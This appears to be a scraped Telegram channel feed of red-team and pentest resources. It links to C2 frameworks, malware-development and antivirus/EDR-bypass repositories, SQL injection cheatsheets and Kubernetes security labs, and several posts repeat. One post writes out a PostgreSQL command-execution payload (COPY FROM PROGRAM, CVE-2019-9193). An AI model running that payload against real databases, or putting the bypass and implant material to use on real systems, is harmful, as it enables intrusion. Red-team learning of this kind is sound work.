The C2 Matrix
* detailed information about the C2 Matrix
* lab environment used to test the various C2s
* details about each C2 (install and use)
* how to setup attack infrastructure
Thec2Matrix
The C2 Matrix | C2 Matrix
Welcome to the C2 Matrix!!
malware development useful links
The post will be updated
#maldev
BypassAV - Repo with the essential techniques to bypass antivirus and EDR
Bypass AV (practical examples) - useful examples & links
shellcode-fluctuation - article
executing the payload in memory - article
maldev-for-dummies - A workshop about Malware Development
The post will be updated
#maldev
Advanced sql injection techniques
Advanced SQL Injection Cheatsheet
SQL Injection Knowledge Base
sqlwiki
Advanced SQL Injection Cheatsheet
SQL Injection Knowledge Base
sqlwiki
Forwarded from xclip
Статьи по созданию кастомных нагрузов для Havoc C2
- https://notateamserver.xyz/havoc-implant/
- https://codex-7.gitbook.io/codexs-terminal-window/red-team/red-team-dev/extending-havoc-c2/third-party-agents
- https://payloads.online/archivers/2023/10/12/fda899c9-47ea-40e6-b6fc-a00600ccc9cb
#malware #redteam
- https://notateamserver.xyz/havoc-implant/
- https://codex-7.gitbook.io/codexs-terminal-window/red-team/red-team-dev/extending-havoc-c2/third-party-agents
- https://payloads.online/archivers/2023/10/12/fda899c9-47ea-40e6-b6fc-a00600ccc9cb
#malware #redteam
Forwarded from Offensive Xwitter
😈 [ MDSec @MDSecLabs ]
Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"
🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/
🐥 [ tweet ]
Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"
🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/
🐥 [ tweet ]
ntlm directories scanner - utility for searching directories that accept ntlm in services such as
* OWA servers
* Skype for Business/Lync servers
* Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
* ADFS servers
GitHub
GitHub - nyxgeek/ntlmscan: scan for NTLM directories
scan for NTLM directories. Contribute to nyxgeek/ntlmscan development by creating an account on GitHub.
🐳1
Forwarded from Внутрянка
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
Продолжу рассуждение…
Для любителей All-in-one
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.
Совершает такие проверки, как
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.
Совершает такие проверки, как
* IP Info
* Server Info
* DNS Records
* Email Configuration
* Open Ports
etc
Kubernetes Goat - Учебная платформа с лабами и материалами по безопасности куба
#kubernetes
* Learning Kubernetes
* OWASP Kubernetes Top 10
* MITRE for kube
* Lab’s scenarios
#kubernetes
Madhuakula
Welcome to Kubernetes Goat | Kubernetes Goat
Interactive Kubernetes Security Learning Playground
RCE in postgres
Автоматизация - Link
(Закомментить
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
Автоматизация - Link
(Закомментить
checkVersion(connection))Exploit Database
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated). CVE-2019–9193 . remote exploit for Multiple platform
Forwarded from Омский багхантер
Самый быстрый способ получить список всех путей веб-приложения на Next.js:
console.log(__BUILD_MANIFEST.sortedPages)
Forwarded from k8s (in)security (r0binak)
Исследователи из
По сути, инструмент сочетает в себе функционал
Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.
WIZ опубликовали OpenSource инструмент NamespaceHound, который позволит найти вектора повышения привилегий в Kubernetes кластерах, где мультитенантность организована на уровне namespaces.По сути, инструмент сочетает в себе функционал
RBAC анализатора и PolicyEngine – он ищет возможные опасные права в кластере, а также избыточно привилегированные и опасные контейнеры (BadPods), с помощью которых потенциальный злоумышленник может нанести существенный импакт кластеру. Сейчас их внутренняя библиотека насчитывает 21 правило.Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.